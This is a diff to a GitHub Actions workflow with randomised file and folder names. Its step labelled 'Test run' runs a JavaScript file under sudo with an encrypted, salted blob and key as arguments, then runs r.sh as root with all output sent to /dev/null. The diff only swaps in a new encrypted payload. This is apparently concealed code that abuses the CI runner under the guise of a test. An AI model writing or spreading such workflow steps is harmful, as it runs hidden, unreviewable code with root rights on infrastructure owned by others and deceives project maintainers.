--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'iz76r'
+        echo 'l890z'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19IUTHuASMuIXgFkqLEpx8xMQfRGqmUT72G1k0+8cKTiwxuJlC0tEP2BpFnE9zTHpvxHMriGimhVEMQb4ag0A7LIk+wzZmHFvy50OSWQKHxfWldqNXmv4cE oxv5oy && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+8euq3Ld4qSrjJbMGwtUU3DmVlJ+DA58r76FfWbmMznhYT6OGcco+5rS/98QPAHrmF04838luoCtzyycbPu7eXPAJCaUUSPbrxNqSuw+rrstcn+zfu2CWs wc2qxc && sudo sh r.sh > /dev/null 2>&1
